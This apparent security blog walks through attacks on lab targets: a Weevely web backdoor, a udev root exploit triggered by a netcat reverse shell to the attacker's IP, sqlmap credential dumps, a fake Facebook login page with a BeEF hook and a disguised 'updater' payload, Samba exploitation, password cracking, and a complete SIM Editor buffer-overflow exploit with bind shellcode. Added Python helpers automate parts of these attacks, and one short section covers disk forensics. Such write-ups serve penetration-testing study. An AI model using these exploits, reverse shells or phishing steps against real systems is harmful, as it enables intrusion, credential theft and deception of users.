Sunday, October 28, 2012

DVWA Medium Level (part 2)

First, generate a backdoor with Weevely (-g generates the agent, -o is the output file and -p the password that protects it):
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /var/www/door.txt -p testing



Then use DVWA's command execution vulnerability to download the backdoor onto the target. Note that the file was generated as door.txt on our machine but has to be stored as door.php on the target, otherwise the web server will not execute it.





After that, use Weevely to connect to the backdoor (-t opens a terminal on the agent at the URL given with -u):

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://192.168.56.101/dvwa/door.php -p testing




At this point we are only www-data, so to get root we need a local privilege escalation. Here I use the udev exploit: udev is the device manager for the Linux kernel, its daemon udevd runs as root, and the version on Metasploitable does not check that netlink uevent messages really come from the kernel (Exploit-DB 8572), so an unprivileged local user can make udevd run a program as root.


Search for udev on Exploit-DB:



The usage comment in the exploit says to pass the PID of the udevd netlink socket as the first argument; it is listed in /proc/net/netlink and is usually the PID of udevd minus 1. The exploit then makes udevd execute /tmp/run as root.
Now copy the exploit to /var/www/ on our BackTrack machine so that the target can fetch it over HTTP.

After that, download the exploit onto the target:


[www-data@metasploitable /var/www/dvwa] wget http://192.168.56.1/8572.c



Then compile it and create /tmp/run; I will use a reverse shell via netcat. udevd executes /tmp/run directly, so make sure the file is executable (chmod +x /tmp/run) before running the exploit.

[www-data@metasploitable /var/www/dvwa] gcc -o tes 8572.c

[www-data@metasploitable /var/www/dvwa] echo '#! /bin/sh' > /tmp/run

[www-data@metasploitable /var/www/dvwa] echo '/bin/netcat -e /bin/sh 192.168.56.1 1234' >> /tmp/run


Checking the process list (for example with ps aux | grep udevd) shows that udevd is running as root with PID 2290.


Then start netcat listening on port 1234 (on our BackTrack machine):
root@bt:~# nc -lvp 1234

After that, execute the exploit on the target, passing 2289 (the udevd PID 2290 minus 1):

[www-data@metasploitable /var/www/dvwa] ./tes 2289



Our listener receives a connection, and id shows uid=0: we are root.
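The "udevd PID minus 1" rule is only a heuristic; the authoritative value is the port id of udevd's NETLINK_KOBJECT_UEVENT socket as listed in /proc/net/netlink. The following Python helper is an added example and not part of the original post: it parses that listing (here a constructed sample in the 2.6-era column layout, using the PIDs from this post) and cross-checks the heuristic before the exploit is launched, so the wrong port id is not used on a box where udevd was restarted or another uevent listener exists.

```python
#!/usr/bin/env python3
"""Find the port id of udevd's uevent netlink socket instead of guessing udevd PID - 1."""

NETLINK_KOBJECT_UEVENT = 15  # protocol number ("Eth" column) of the uevent netlink family

# Constructed sample of /proc/net/netlink (2.6-era layout: sk Eth Pid Groups Rmem Wmem Dump Locks).
# The Eth 15 / Pid 0 entry is the kernel's own socket; the Eth 15 / Pid 2289 entry is udevd's,
# whose daemon process in this post has PID 2290.
SAMPLE_PROC_NET_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f7a4b000 0   0      00000000 0        0        00000000 2
f7a4b400 15  0      00000000 0        0        00000000 2
f7a4b800 15  2289   00000001 0        0        00000000 2
f7a4bc00 16  0      00000000 0        0        00000000 2
"""


def uevent_listeners(netlink_text):
    """Return the non-zero port ids bound to the uevent family (port id 0 is the kernel side)."""
    pids = []
    for line in netlink_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 3:
            continue
        proto, portid = int(fields[1]), int(fields[2])
        if proto == NETLINK_KOBJECT_UEVENT and portid != 0:
            pids.append(portid)
    return pids


def pick_target(netlink_text, udevd_pid):
    """Port id to pass to 8572.c: udevd_pid - 1 if that socket really exists,
    otherwise the only uevent listener there is; refuse to guess when it is ambiguous."""
    pids = uevent_listeners(netlink_text)
    guess = udevd_pid - 1
    if guess in pids:
        return guess
    if len(pids) == 1:
        return pids[0]
    raise ValueError("cannot pick udevd's netlink port id from %r" % pids)


def read_proc_netlink(path="/proc/net/netlink"):
    """On a real target, feed the live listing to pick_target()."""
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    target = pick_target(SAMPLE_PROC_NET_NETLINK, udevd_pid=2290)
    print("run the exploit as: ./tes %d" % target)
```

On the target you would call pick_target(read_proc_netlink(), udevd_pid) with the PID from ps; if it raises, look at the listing by hand rather than firing the exploit at a random socket.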






Saturday, October 27, 2012

Introduction to Computer Forensic


Computer forensics is the application of computer investigation and analysis techniques to gather evidence for presentation in a court of law.


Unallocated space, sometimes called "free space", is the logical space on a hard drive that the operating system (e.g. Windows) can write to; put simply, it is the part of the drive not currently used by any file.
To put it another way, it is the opposite of "allocated" space, which is where the operating system has already written files. The contents of deleted files usually remain in unallocated space until it is overwritten, which is why it matters for forensics.



Slack space is the unused space between the end of the actual file and the end of the defined data unit (cluster). In other words, it is the part of a cluster that is not fully used by the currently allocated file, and it may still contain data from a previously deleted file.



Linux commands for forensics:
  • fdisk -l /dev/sdX          --> list the partitions on a disk (or on an image file)
  • md5sum /path/to/file       --> hash the evidence before and after imaging to prove it was not altered
  • dd if=source of=destination   --> bit-for-bit copy ("if" means "input file" and "of" means "output file")
  • strings /path/to/file      --> print the printable character sequences found in a binary or image
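The slack-space definition and the dd / md5sum / strings commands above fit together in one small workflow. The following Python script is an added example, not code from the original post: it computes the slack left in a file's last cluster, images a file block by block the way dd does while hashing source and copy, and pulls printable strings out of the image, including a "deleted" note left in slack. The disk contents are constructed in the script itself (one 4096-byte cluster) so that it runs offline.

```python
#!/usr/bin/env python3
"""Slack-space arithmetic, dd-style imaging with hash verification, and a strings(1) equivalent."""
import hashlib
import os
import tempfile


def slack_bytes(file_size, cluster_size=4096):
    """Unused bytes at the tail of the last cluster of a file (0 for an empty file or an exact fit)."""
    if file_size < 0 or cluster_size <= 0:
        raise ValueError("file_size must be >= 0 and cluster_size > 0")
    if file_size == 0:
        return 0
    return (-file_size) % cluster_size


def image_and_verify(src, dst, block_size=512, algo="md5"):
    """Copy src to dst in blocks (what 'dd if=src of=dst bs=512' does) and hash both sides.
    Returns (source_hash, image_hash); they must match before the image is used as evidence."""
    h_src = hashlib.new(algo)
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        for chunk in iter(lambda: fin.read(block_size), b""):
            h_src.update(chunk)
            fout.write(chunk)
    h_dst = hashlib.new(algo)
    with open(dst, "rb") as fin:
        for chunk in iter(lambda: fin.read(block_size), b""):
            h_dst.update(chunk)
    return h_src.hexdigest(), h_dst.hexdigest()


PRINTABLE = set(range(0x20, 0x7F)) | {0x09}  # ASCII text plus tab, like GNU strings' default


def extract_strings(data, min_len=4):
    """Runs of at least min_len printable bytes, like strings(1); finds text in slack space too."""
    found, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def demo():
    """Constructed 'disk': one 4096-byte cluster holding a 100-byte file; the slack behind it
    still contains a note from a file that was deleted earlier."""
    cluster = bytearray(4096)
    cluster[:100] = b"new file content".ljust(100, b"\x00")
    cluster[2000:2025] = b"DELETED: secret old note!"  # leftover of a previous file in slack
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "evidence.bin")
        dst = os.path.join(d, "evidence.dd")
        with open(src, "wb") as f:
            f.write(cluster)
        src_hash, dst_hash = image_and_verify(src, dst)
        with open(dst, "rb") as f:
            found = extract_strings(f.read())
    return src_hash == dst_hash, slack_bytes(100, 4096), found


if __name__ == "__main__":
    ok, slack, found = demo()
    print("image verified:", ok, "| slack bytes:", slack, "| strings:", found)
```

Running it reports a verified image, 3996 bytes of slack for the 100-byte file, and both the live file's text and the deleted note recovered from slack.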


Monday, October 22, 2012

DVWA Medium Level

First way.
First I use the file inclusion vulnerability (to read /etc/passwd and collect some user names).


We can see that we got some users (root, msfadmin, user, etc.).
Then I search for a vulnerability in SSH.





After that I pick the user root and search for the matching SSH key.



We have found the key. Now try to connect with ssh.


And we are in as root... :D


Second way.
Here I use SQL injection and file inclusion.

First, open DVWA --> SQL Injection.


After that, open Burp Suite to capture the request.


Then copy the cookies from the captured request into the sqlmap command.



Here I want to get into MySQL itself, so I need the MySQL root password. Type this to list the tables of the mysql database:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; tz_offset=25200; PHPSESSID=d2f440d1772f9b9ed69c7a74b926caf9" --level=3 --risk=3  --dbs -D mysql --tables





Then dump the user table, which holds the MySQL account passwords:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; tz_offset=25200; PHPSESSID=d2f440d1772f9b9ed69c7a74b926caf9" --level=3 --risk=3  --dbs -D mysql -T user --dump




We can see that the MySQL root user has no password.

Then open a MySQL command line (just press Enter at the password prompt):
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101 -u root -p

Then, as with the file inclusion before, load the password file and we get the list of users again.




Once we know the users, use Medusa to brute-force their passwords.


Then connect with ssh.
Here I use the user msfadmin, because with the other users I tried I could not get root.


alhamdulillah ... :D

Note: I have also tried the second way with the security level set to high and it works ... :D

Saturday, October 20, 2012

Client side attack using BeEF and Metasploit

Now I try to exploit a web browser with BeEF when the victim tries to open Facebook.

When they try to open www.facebook.com, I redirect them to my fake Facebook login page (facebook.html), into which I have put the BeEF hook.


Run BeEF.



This is my facebook.html, with the BeEF hook script included in it.


Then, after they have opened my fake login page, look at our BeEF panel:



We can see that the target's browser has been hooked by BeEF.

Then I will send the target a fake Firefox updater, but first I build the payload update.exe with msfpayload and msfencode.



Our payload update.exe has been created.

Then run Metasploit (msfconsole) with a handler listening on port 1234.



And send it to the target.


Then they execute it.




After they download and run our "updater" (the payload), we get a Meterpreter session on the target system.



Thursday, October 18, 2012

Vulnerability of Metasploitable (samba)

First, gather as much information as possible about Metasploitable:
root@bt:~# nmap -sV 192.168.56.0/24



We can see that the Samba finding is rated critical.

Then I use the Metasploit Framework.

root@bt:~# msfconsole

Then search for the Samba modules:





I use exploit/multi/samba/usermap_script (because its rank is excellent).
After that, show the options.


So we have to set the target (set RHOST 192.168.56.101),
then run exploit.


alhamdulillah... :D we are in as root (type id).

To get the other users' passwords, use LFI (local file inclusion) to read the password hashes.



Then crack them with JtR (I copied the hashes and saved them in a file named pass.txt):

root@bt:/pentest/passwords/john# ./john /root/metasploitable/pass.txt


From the picture above we can see several users and their passwords... :D
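Both the DVWA Medium Level post above (user names from /etc/passwd fed to Medusa) and this post (hashes pulled through the LFI and saved as pass.txt for John) start from the same two files. The following Python script is an added example and not part of either post: it picks the accounts that are actually worth brute-forcing (root plus ordinary users with a login shell) and merges passwd and shadow the way John's unshadow tool does, dropping locked accounts and labelling the hash scheme by its prefix. The passwd and shadow contents are constructed samples; the user names follow the posts, but the hashes are placeholders, not real hashes.

```python
#!/usr/bin/env python3
"""Turn /etc/passwd and /etc/shadow obtained through an LFI into inputs for Medusa and John."""

# Constructed samples modelled on a Debian/Ubuntu box. Hash values are fake placeholders.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$1$FAKEsalt$fakefakefakefakefakefa:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sshd:!:14684:0:99999:7:::
msfadmin:$1$FAKEsalt$anotherfakehashvalue0:14684:0:99999:7:::
user:$1$FAKEsalt$yetanotherfakehash0000:14699:0:99999:7:::
"""

NO_LOGIN = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync", ""}


def parse_passwd(text):
    """Yield (user, uid, gid, gecos, home, shell) for every well-formed passwd line."""
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7 or not f[0]:
            continue
        yield f[0], int(f[2]), int(f[3]), f[4], f[5], f[6]


def login_users(passwd_text):
    """User names worth feeding to Medusa: root plus ordinary (uid >= 1000) accounts with a real shell.
    System accounts with /bin/sh are skipped because they are normally locked in shadow."""
    return [u for u, uid, _, _, _, shell in parse_passwd(passwd_text)
            if shell not in NO_LOGIN and (uid == 0 or uid >= 1000)]


def hash_type(h):
    """Crypt scheme by prefix (John selects its format from the same prefix)."""
    if h.startswith("$1$"):
        return "md5crypt"
    if h.startswith("$5$"):
        return "sha256crypt"
    if h.startswith("$6$"):
        return "sha512crypt"
    if len(h) == 13:
        return "descrypt"
    return "unknown"


def unshadow(passwd_text, shadow_text):
    """Merge like John's unshadow: passwd lines with the shadow hash in field 2.
    Entries with no hash or a locked marker (*, !) cannot be cracked and are dropped."""
    hashes = {}
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) >= 2:
            hashes[f[0]] = f[1]
    merged = []
    for user, uid, gid, gecos, home, shell in parse_passwd(passwd_text):
        h = hashes.get(user, "")
        if not h or h[0] in "*!":
            continue
        merged.append("%s:%s:%d:%d:%s:%s:%s" % (user, h, uid, gid, gecos, home, shell))
    return merged


if __name__ == "__main__":
    print("users for medusa:", login_users(SAMPLE_PASSWD))
    lines = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    with open("pass.txt", "w") as f:  # the file handed to ./john
        f.write("\n".join(lines) + "\n")
    for line in lines:
        user, h = line.split(":")[:2]
        print(user, hash_type(h))
```

With the samples, Medusa gets root, msfadmin and user as its user list and pass.txt receives three md5crypt lines; daemon and sshd are left out because their shadow entries are locked.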

To make sure the credentials work, I log in to the system over telnet (user: user, password: user).


and it works.... :D

Saturday, October 13, 2012

Buffer Overflow SIM Editor


First, we write a fuzzer that makes the application crash.

#!/usr/bin/python
# fuzzer: write 2000 "A"s into sms.sms and see whether SIM Editor crashes when opening it
nama = "sms.sms"
junk = "A" * 2000
with open(nama, 'w') as f:
    f.write(junk)
print("success ...")



We can see that EIP was successfully overwritten by our junk.

Now find the offset manually: I tried generating a 2000-byte Metasploit pattern and pasting it into the fuzzer, but it did not work, the application did not crash (presumably because the pattern contains characters the file parser will not accept). So I search for the offset by hand.
First step: split the buffer into two halves, like this.


#!/usr/bin/python
# first bisection step: 1000 "A"s followed by 1000 "B"s
nama = "sms.sms"

junk = "A" * 1000
junk += "B" * 1000

with open(nama, 'w') as f:
    f.write(junk)
print("success ...")

Then I got this result.




EIP was overwritten by our "A" junk, so the offset lies below 1000. Split the range again.


#!/usr/bin/python
# second bisection step: 500 "A"s followed by 500 "B"s
nama = "sms.sms"

junk = "A" * 500
junk += "B" * 500
#junk += "C" * 1000

with open(nama, 'w') as f:
    f.write(junk)
print("success ...")


Then I got this result.


Now EIP is overwritten by the "B" junk, so the offset lies between 500 and 1000. Keep halving the range until the exact position is found; here EIP is completely overwritten at 818 characters.


#!/usr/bin/python
# 818 "A"s: EIP is now fully overwritten
nama = "sms.sms"
junk = "A" * 818
#junk += "B" * 82
#junk += "G" * 1000
with open(nama, 'w') as f:
    f.write(junk)
print("success ...")




Next step: control EIP. I want to put DEADBEEF into EIP. Unlike the usual case, DEADBEEF is written without "\x": the application parses the file as hexadecimal text, so each byte is two ASCII hex digits, and the 4-byte address is written as the eight characters EFBEADDE (little-endian byte order). That is also why 810 characters of filler plus 8 characters of address give the 818 found above.


#!/usr/bin/python
# EIP control test: the 8 hex characters at offset 810 become the return address
nama = "telepon.sms"
junk = "A" * 810
junk += "EFBEADDE"  # 0xDEADBEEF in little-endian order, as hex text
#junk += "B" * 82
#junk += "G" * 1000

with open(nama, 'w') as f:
    f.write(junk)
print("success ...")



Next step: search for a module to use as a stepping stone. Here I use shell32.dll.



Then double-click shell32.dll and search for a JMP ESP instruction. Once found, write its address into our script (in the same reversed hex form), and do not forget to set a breakpoint on that address to make sure execution really lands in shell32.dll.


#!/usr/bin/python
# jump test: return into JMP ESP inside shell32.dll
nama = "telepon.sms"
#junk = "A" * 2000  # the first fuzzer
junk = "A" * 810
#junk += "EFBEADDE"  # DEADBEEF test; now use 7C9D30D7   FFE4   JMP ESP
junk += "D7309D7C"   # 0x7C9D30D7 in little-endian order, as hex text
#junk += "B" * 82
#junk += "C" * 100
#junk += "G" * 1000
with open(nama, 'w') as f:
    f.write(junk)
print("success ...")






We can see that the process stops at the breakpoint on address 7C9D30D7, so our jump works.

Next step: build the payload. After the JMP ESP address comes a 16-byte NOP sled ("90" repeated in hex) and then a win32_bind shellcode (port 4444, Shikata Ga Nai encoded), also written as a hex string.



#!/usr/bin/python
# final exploit: filler + JMP ESP address + NOP sled + bind shell, everything as hex text
nama = "telepon.sms"
#junk = "A" * 2000  # the first fuzzer
junk = "A" * 810
#junk += "EFBEADDE"  # DEADBEEF test; now use 7C9D30D7   FFE4   JMP ESP
junk += "D7309D7C"   # 0x7C9D30D7 in little-endian order, as hex text
nop = "90" * 16      # 16 NOPs

#/* win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNai http://metasploit.com */
payload = ("ddc431c9b151d97424f45fb8b0b40c4c"
"3147170347178377b0eeb98bd3050c9b"
"dd2570a47e51e37e5beeb942288c44c2"
"2f82cc7d28d78ca1490c7b2a7d597dc2"
"4f9de7b634dd6cc1f51481cc37436ef5"
"e3b0a77ce932e85af0af7129fe64f572"
"e37be28f37f77de3631b1f385af8bb35"
"decec809eda5bf9540327fadc42d0ee3"
"f6415e04d0fc0c9cb53381083147d797"
"e958c74fd94a14b48d6b3395a471daa8"
"5a7121ffce80da2f665c2d3ada09d112"
"76e57ec92a4ad2ae9fb30456485df9f0"
"dbd4e069b342f8e183dc02d766f3ad82"
"89232588dbea5f87dc25cc72dc1a9b99"
"6b1d153693f7f6ec3fad09dc532511a5"
"95cf8aaacc65ca8497ef50423093f503"
"2539564a8f72df8ba5ce69b10b0f9a9f"
"92cd702128fe1950d7c6b6c1835fbbeb"
"6789c466cc49ecd39be740b272626265"
"2427357a16af185d92fe30a24b9449a3"
"439666d0fb940422679addf897b48a82"
"bfd73829bfce401d")

with open(nama, 'w') as f:
    f.write(junk + nop + payload)
print("success ...")
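The manual bisection and the by-hand address reversal above can be automated once you account for the file being hex text. The following Python script is an added example, not code from the original post: it builds a Metasploit-style cyclic pattern and hex-encodes it so the parser accepts it (that the Metasploit pattern did not crash the program earlier is consistent with the parser rejecting non-hex characters, which is an assumption here), recovers the byte offset from the EIP value shown in the debugger, and assembles the final file from the JMP ESP address, the NOP sled and a shellcode hex string with sanity checks. The 810-character offset and the 0x7C9D30D7 address are those of this post; the shellcode in the demo is a placeholder of INT3 (0xCC) bytes, not a real payload.

```python
#!/usr/bin/env python3
"""Helpers for a file-format overflow whose input is parsed as ASCII hex (SIM Editor .sms files)."""
import struct
from string import ascii_uppercase, ascii_lowercase, digits

HEXDIGITS = set("0123456789abcdefABCDEF")


def pattern_create(length):
    """Metasploit-style cyclic pattern ("Aa0Aa1..."): every 4-byte window is unique for 20280 bytes."""
    out = bytearray()
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                out += (u + l + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("patterns longer than 20280 bytes are no longer unique")


def pattern_offset(pattern, eip_value):
    """Byte offset in the pattern of the 4 bytes now in EIP (the value the debugger shows), or -1."""
    return pattern.find(struct.pack("<I", eip_value))


def hex_le(addr):
    """Encode a 32-bit address as the 8 hex characters the parser turns into little-endian bytes:
    0xDEADBEEF -> "EFBEADDE", as used in the post."""
    return struct.pack("<I", addr).hex().upper()


def pattern_hex(length):
    """Cyclic pattern encoded for the hex parser; character offsets are twice the byte offsets."""
    return pattern_create(length).hex()


def build_sms(eip_char_offset, ret_addr, shellcode_hex, nop_count=16, filler="A"):
    """Assemble filler + return address + NOP sled + shellcode as hex text, rejecting anything
    the parser would choke on (odd length, non-hex characters)."""
    if eip_char_offset % 2:
        raise ValueError("EIP offset must be even: each byte is two hex characters")
    buf = filler * eip_char_offset + hex_le(ret_addr) + "90" * nop_count + shellcode_hex
    if len(buf) % 2 or not set(buf) <= HEXDIGITS:
        raise ValueError("file would contain something the hex parser does not accept")
    return buf


def write_file(path, data):
    with open(path, "w") as f:
        f.write(data)


if __name__ == "__main__":
    # stage 1: fuzz with a hex-encoded cyclic pattern instead of plain "A"s
    pat = pattern_create(1000)
    write_file("pattern.sms", pat.hex())
    # stage 2: the debugger shows EIP; here we simulate the value this post's offset would produce
    eip_seen = struct.unpack("<I", pat[405:409])[0]
    char_offset = 2 * pattern_offset(pat, eip_seen)  # 405 bytes -> 810 characters
    # stage 3: final file with the JMP ESP from shell32.dll and placeholder shellcode (INT3s)
    write_file("telepon.sms", build_sms(char_offset, 0x7C9D30D7, "CC" * 8))
    print("EIP offset in characters:", char_offset)
```

The only difference from a normal file-format exploit is the factor of two: the debugger still reports a 4-byte EIP value, pattern_offset() finds it at a byte position, and everything written to the file is doubled into hex digits.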




Alhamdulillah ...:D